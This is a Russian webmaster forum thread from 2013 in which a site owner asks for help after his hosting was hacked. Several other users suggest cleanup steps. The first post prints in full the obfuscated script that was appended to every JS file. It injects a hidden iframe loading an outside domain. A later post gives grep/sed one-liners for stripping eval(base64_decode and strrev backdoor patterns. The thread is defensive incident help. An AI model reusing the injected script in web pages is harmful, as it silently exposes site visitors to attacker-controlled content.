X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

Открыть тему
Тема закрыта
> Взломали хостинг, пострадали сайты, Joomla, Что делать, как решать?
topsmiling
topsmiling
Topic Starter сообщение 13.8.2013, 22:45; Ответить: topsmiling
Сообщение #1


Взломали хостинг. Все сайты на хостинге пострадали.
Все JS файлы изменены и в них добавлена строка следующего содержания:
Развернуть/Свернуть

;document.write(unescape('<script%3E%0A%76%61%72%20%5F%30%78%31%33%65%61%3D%5B%22%5C%78%33%43%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%32%30%5C%78%37%33%5C%78%37%34%5C%78%37%39%5C%78%36%43%5C%78%36%35%5C%78%33%44%5C%78%32%32%5C%78%37%30%5C%78%36%46%5C%78%37%33%5C%78%36%39%5C%78%37%34%5C%78%36%39%5C%78%36%46%5C%78%36%45%5C%78%33%41%5C%78%36%31%5C%78%36%32%5C%78%37%33%5C%78%36%46%5C%78%36%43%5C%78%37%35%5C%78%37%34%5C%78%36%35%5C%78%33%42%5C%78%32%30%5C%78%37%34%5C%78%36%46%5C%78%37%30%5C%78%33%41%5C%78%32%44%5C%78%33%35%5C%78%33%30%5C%78%33%38%5C%78%37%30%5C%78%37%38%5C%78%33%42%5C%78%32%32%5C%78%33%45%5C%78%33%43%5C%78%36%39%5C%78%36%36%5C%78%37%32%5C%78%36%31%5C%78%36%44%5C%78%36%35%5C%78%32%30%5C%78%37%33%5C%78%37%32%5C%78%36%33%5C%78%33%44%5C%78%32%32%5C%78%36%38%5C%78%37%34%5C%78%37%34%5C%78%37%30%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%36%41%5C%78%36%46%5C%78%36%44%5C%78%36%43%5C%78%36%31%5C%78%36%41%5C%78%36%31%5C%78%37%36%5C%78%36%31%5C%78%37%33%5C%78%36%33%5C%78%37%32%5C%78%36%39%5C%78%37%30%5C%78%37%34%5C%78%32%45%5C%78%37%32%5C%78%37%35%5C%78%32%46%5C%78%32%32%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%39%5C%78%36%36%5C%78%37%32%5C%78%36%31%5C%78%36%44%5C%78%36%35%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%33%45%22%2C%22%5C%78%37%37%5C%78%37%32%5C%78%36%39%5C%78%37%34%5C%78%36%35%22%5D%3B%64%6F%63%75%6D%65%6E%74%5B%5F%30%78%31%33%65%61%5B%31%5D%5D%28%5F%30%78%31%33%65%61%5B%30%5D%29%3B%0A%3C%2F%73%63%72%69%70%74%3E'));


1 сайт = 522 js файла. На большую часть сайтов мне плевать, но 3 из них мне нужны. Итого 1500 js файлов.

Во всех папках добавлен файл. Простой HTML файл с содержанием "Hacked By WildClique , Albanian Hackers".

У меня был бэкап, я дебил его удалил час назад sad.gif

Сайты сами по себе странно обновляются. Идет редирект на какой то сайт бессмысленный, но на сам сайт не переходит.

Редактор в Joomla перестал работать нормально.

Что мне делать? Кто поможет?


--------------------
.
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Vangan
Vangan
сообщение 13.8.2013, 22:53; Ответить: Vangan
Сообщение #2


может скачать все js файлы и сделать замену вредоносного кода везде, поможет это сделать программа типо Useful File Utilities или аналогичная.

Сообщение отредактировал Vangan - 13.8.2013, 22:54
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
topsmiling
topsmiling
Topic Starter сообщение 13.8.2013, 22:56; Ответить: topsmiling
Сообщение #3


Только что обнаружил что перенаправляет на сайт http://jomlajavascript.ru/ . Вот смотрите как он обновляется странно после того как полностью загрузилась страничка.

Vangan, я сделал на одном из сайтов. Не помогло. Сайт все равно обновляется.


--------------------
.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Vangan
Vangan
сообщение 13.8.2013, 23:00; Ответить: Vangan
Сообщение #4


А есть доступ к сайту по SSH?

Может сделать команду

#grep -lr --include=*.php "eval(base64_decode" /pathWebroot | xargs sed -i.bak 's/eval(base64_decode[^;]*;//'
#grep -lr --include=*.php "strrev(" /pathWebroot | xargs sed -i._bak 's/$_ = strrev([^;]*; @$_([^;]*;//'

Правда изменить их под свой вредоносный код, одна команда удалит вхождения, вторая на всякий пожарный сделает "бакуп"

Сообщение отредактировал Vangan - 13.8.2013, 23:03
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
LoraDi
LoraDi
сообщение 13.8.2013, 23:05; Ответить: LoraDi
Сообщение #5


Версия движков? (icq в профиле...)

Vangan, смысл… сайты взломаны… со временем эта кака появится ещё раз…

Сообщение отредактировал LoraDi - 13.8.2013, 23:06


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Vangan
Vangan
сообщение 13.8.2013, 23:18; Ответить: Vangan
Сообщение #6


LoraDi, я подумал, что ТС требуется хотя бы востановить работоспособность сайтов, а дальше уже производить меры
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Услуги хостинг, аренда серверов США, Нидерланды, РФ | RICHHost
108 RICHHost 65923 26.3.2024, 5:23
автор: RICHHost
Открытая тема (нет новых ответов) Куплю хорошие сайты
7 Boymaster 2345 25.3.2024, 12:50
автор: Wilkinson
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыСайты уходят в прошлое
для развития бизнеса стали не столь актуальны
146 muratastana 27656 24.3.2024, 21:26
автор: Liudmila
Горячая тема (нет новых ответов) LITE.HOST - хостинг для тех, кто любит не переплачивать
73 akkyoh 30440 24.3.2024, 18:28
автор: Kseniya_Klimova
Открытая тема (нет новых ответов) Как монетизировать сайты сателлиты?
7 uahomka 2004 20.3.2024, 21:26
автор: MisterBit


 



RSS Текстовая версия Сейчас: 28.3.2024, 21:18
Дизайн